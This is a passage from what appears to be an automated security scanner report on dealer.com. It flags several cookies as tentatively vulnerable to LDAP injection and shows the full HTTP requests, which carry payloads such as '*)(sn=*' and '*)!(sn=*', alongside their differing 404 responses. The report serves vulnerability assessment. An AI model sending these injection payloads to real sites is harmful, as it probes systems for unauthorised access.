com.silverpop.iMA.page_visit./products/lead-management/=*)(sn=*; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002863; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.46.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20215
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:26:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003618; expires=Mon, 16-Apr-2012 01:26:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Dealer.com's backend tool is definitely the best in the industry. I like the simplicity of one login, and how all the webstats are one click away.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We've incorporated more of Dealer.com's products because everything we put in place has worked. I really feel like we've got a partner in Dealer.com. </p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p> If I were to suggest any web provider in the world, I would suggest Dealer.com. Sign up today!</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Since we've had a Dealer.com website our traffic has increased, our conversion has increased, and our website ranking is great. If you Google &#8220;used cars in Denver,&#8221; we are always on top.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Everyday we are told about how great our site is and how easy it is to get information from. We recently started a billboard campaign called "Shop in Your Underwear at Stevebaldo.com" to capture the majority of customers already online doing &#8230;</p>
   <cite>Sheila K. Snyder, Steve Baldo Dealerships</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/produc
...[SNIP]...

Request 2

GET /products/inventory-marketing/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/inventory-marketing/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=*)!(sn=*; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002863; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.46.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20189
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:27:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003619; expires=Mon, 16-Apr-2012 01:26:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The backend administrative system is just so easy and fast to use.</p>
   <cite>Greg Nalewaja, General Manager, Metro Honda of Union County</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Throughout my first few years here, researching and developing both a website and the Internet Sales Department for this dealership, I have used several nationally known Internet Service Providers (ISP). Dealer.com ended up the clear winner for more reasons than I &#8230;</p>
   <cite>Mike Poulin, Shearer Pontiac Cadillac Hummer</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com is always looking for ways to improve, so they're intense in that. They're never standing still and their service is impeccable.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spo
...[SNIP]...

1.4. http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/loading.gif [exp_last_visit cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/call-tracking/media/uploads/page/loading.gif

Issue detail

The exp_last_visit cookie appears to be vulnerable to LDAP injection attacks.

The payloads 714ccbf8941beef9)(sn=* and 714ccbf8941beef9)!(sn=* were each submitted in the exp_last_visit cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /products/lead-management/call-tracking/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=714ccbf8941beef9)(sn=*; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002857; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Flvlc%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.42.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19951
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:15:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002958; expires=Mon, 16-Apr-2012 01:15:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>With Dealer.com, we continuously improve and advance. We added video to our website this year and doubled the average time people spend on our site.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com has lived up to every one of their promises.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p> If I were to suggest any web provider in the world, I would suggest Dealer.com. Sign up today!</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight
...[SNIP]...

Request 2

GET /products/lead-management/call-tracking/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=714ccbf8941beef9)!(sn=*; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002857; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Flvlc%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.42.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20054
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:15:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002959; expires=Mon, 16-Apr-2012 01:15:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>I&#8217;ve had access to other people&#8217;s systems, so I can honestly say that Dealer.com is by far the easiest to for the end user.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversio
...[SNIP]...

1.5. http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/ cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/loading.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=*)(sn=*; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002983; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.47.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20312
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:28:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003738; expires=Mon, 16-Apr-2012 01:28:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>I don't care who your website provider is, if it's not Dealer.com you need to at least take a look at them. I give them my absolute whole-hearted endorsement. I put my name on it. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com for over a year now and the entire experience has been positive.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>This is an awesome company which just happens to have their headquarters located about 5 minutes away from our dealership. I know their employees personally, I have been inside their building, and I have seen the explosive growth they have achieved. &#8230;</p>
   <cite>John Kimel, Lewis Autos</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>In the 2 years that we have been with Dealer.com, our rankings have drastically improved, and our lead volume has gone up at least 40%.</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Mark
...[SNIP]...

Request 2

GET /products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/loading.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=*)!(sn=*; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002983; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.47.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20284
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:29:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003739; expires=Mon, 16-Apr-2012 01:28:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We depend very heavily on the SEO team at Dealer.com to ensure that our goals are accomplished as it relates to where we show up in the search engines.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The transition to Dealer.com from our previous provider was way beyond my expectations. If someone were to contact me for advice regarding which website provider would be the best, I would say Dealer.com, hands down. </p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>For dealers who want to compete using SEO, they don&#8217;t need to build outside microsites for content anymore. They can do it right inside the Dealer.com platform.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spo
...[SNIP]...

1.6. http://www.dealer.com/products/lead-management/media/uploads/page/loading.gif [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/media/uploads/page/loading.gif

Issue detail

The __utma cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
